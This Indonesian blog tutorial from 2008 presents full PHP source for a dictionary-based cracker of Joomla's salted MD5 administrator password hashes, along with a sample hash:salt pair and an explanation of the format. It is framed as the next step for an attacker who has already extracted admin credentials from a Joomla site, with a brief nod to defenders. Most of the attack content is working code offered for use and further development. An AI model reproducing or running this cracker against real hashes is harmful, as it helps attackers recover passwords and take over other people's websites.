Konsep sederhana Joomla Password Cracker

Konsep sederhana Joomla Password Cracker

15-11-2008 | 15:51:31 | Halaman Ini dibaca 15337 kali

joomla

Apa yang akan penulis jelaskan disini, begitu juga dengan apa yang telah penulis jelaskan pada tutorial sebelum-sebelumnya, mengenai hacking tentunya, di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di satu sisi seorang admin web dapat menjaga ketat sitenya dengan aman, namun patut diketahui pula tidak ada sistem yang memiliki keamanan 100%, selalu saja ada bolong yang masih dapat di eksploitasi, tapi setidaknya dapat meminimalisir serangan yang ada, dan di sisi lain yang akan penulis terangkan nanti tentunya cenderung digunakan untuk kegiatan vandalisme/merusak oleh beberapa pihak. Ya, tidak heran jika teori tesis dan anti tesis kerapkali hadir dalam dunia perhackingan ini. Di satu sisi membangun tapi di sisi lain menghancurkan. Lantas yang harus di lakukan sekarang adalah, tetap waspada pada security risk yang ada, dan ketahuilah tamu tak diundang selalu menyempatkan waktunya untuk hadir memonitoring site anda, jika anda melakukan sedikit saja salah langkah akibatnya cukup fatal.

Waha… sepertinya intro tutorial harus dipisahkan sendiri dalam tutorial yang berbeda, jari penulis begitu asik menari-nari di atas tuts keyboard sampai-sampai lupa pada pokok pembahasan. :D.

Ya, berdasarkan artikel sebelumnya, betapa mudahnya seorang attacker mendapatkan username dan password sang administrator pada content management system seperti joomla, tapi masih terdapat satu masalah, dimana seorang attacker masih belum dapat melakukan eksploitasi lebih lanjut, dikarenakan password yang didapatkan itu masih dalam bentuk password yang terenkripsi, sehingga butuh perlakuan khusus lebih lanjut untuk mendapatkan password yang sesungguhnya. Di sinilah penulis akan mencoba menjelaskan sebuah konsep sederhana bagaimana mendapatkan suatu password asli yang terenkripsi, namun penulis hanya membatasi cracking password pada satu jenis hash saja, yaitu joomla hash password. Penjelasan yang akan penulis lakukan bukanlah mencoba membuat algoritma dekripsi password tetapi hanyalah penggunaan metode dictionary file, dimana untuk mendapatkan password asli cukup dilakukan pencocokan password dengan kamus data yang ada sehingga menghasilkan password yang sebenarnya. :D. Namun setiap aplikasi selalu saja memiliki kekurangan, penulis tidak menafikan hal itu. Karena kesempurnaan hanyalah milik sang Pencipta. πŸ˜‰ Kekurangannya adalah resource memori yang di butuhkan untuk metode seperti ini cenderung lebih besar dari ukuran biasanya.

Berikut adalah source code lengkap ‘simple joomla password cracker’ :

———————–// cut here

::: Joomla Password Cracker :::





 

 

 

Simple
Joomla Password Cracker
Developed by : ilmuwebsite.com



Masukkan
password hashnya disini :


<?php
$hashes=array();
$i=0;
$parts=explode(“:”,$_POST[‘hash’]);
$hashes[$i][0]=$parts[0];
$hashes[$i][1]=$parts[1];

if (ISSET($_POST[‘hash’]))
{
$str = ” “;
echo “Started: “;
echo date(“F j, Y, g:i:s a”);

$lines = file(‘kamus2.txt’);

foreach ($lines as $line_num => $line)
{
check($line);
}

$lines = file(‘kamus1.txt’);

foreach ($lines as $line_num => $line)
{
check($line);
}

echo “
Finished : “;
echo date(“F j, Y, g:i:s a”);

}

function check($a)
{
global $i;
$a=rtrim($a) ;

for($x=0;$x<=$i;$x++)
{
global $hashes;

if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo “

The password is :

$a

“;
echo “Ended: “;
echo date(“F j, Y, g:i:s a”);
}

}

}
?>

Tolong di kembangkan ya ?! πŸ˜€

———————–// cut here

Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini :
memory_limit = 32M ;

menjadi > 32, penulis menggantinya menjadi :
memory_limit = 256M ;

Ya, sebelum berlanjut, penulis akan membahas struktur password joomla yang terenkripsi terlebih dahulu, enkripsi password joomla biasanya terdiri dari hash dan salt. Standar enkripsi joomla biasanya berbentuk seperti ini :

b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK

Hashnya itu terdapat pada bagian yang pertama yaitu b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir 9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua “:”. Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian password sesungguhnya.
Yang ditemukan disini adalah jika password berbentuk plain text di gabung dengan saltnya maka akan menghasilkan hash password joomla. Dengan kata lain jika : x + salt = hash joomla. Sehingga jika di implementasikan melalui enkripsi md5 :

md5(x + salt) = hash

maka :

md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116

berapakah x ? ( pak Mamat guru matematika di SMAN 4 Bogor kayanya tau. πŸ˜€ huehuehuehehe… )

Ya seperti pada baris kalimat ini :


if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo “

The password is :

$a

“;

Dan hasilnya adalah …

:D~~

Penulis yakin anda cukup familiar dengan source di atasnya. Dan algoritmanya pun cukup mudah. Script lengkap dan kamus passwordnya dapat di download di sini …
Selamat mencoba. Selamat mengembangkan ! πŸ˜€

Greetz for : b_scorpio, peterpanz, abuzahra, phii_, nazwa, jojo, ivan, fadli, safril, dr.emi, husniearif, [H], dan ilmuwebsite community.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s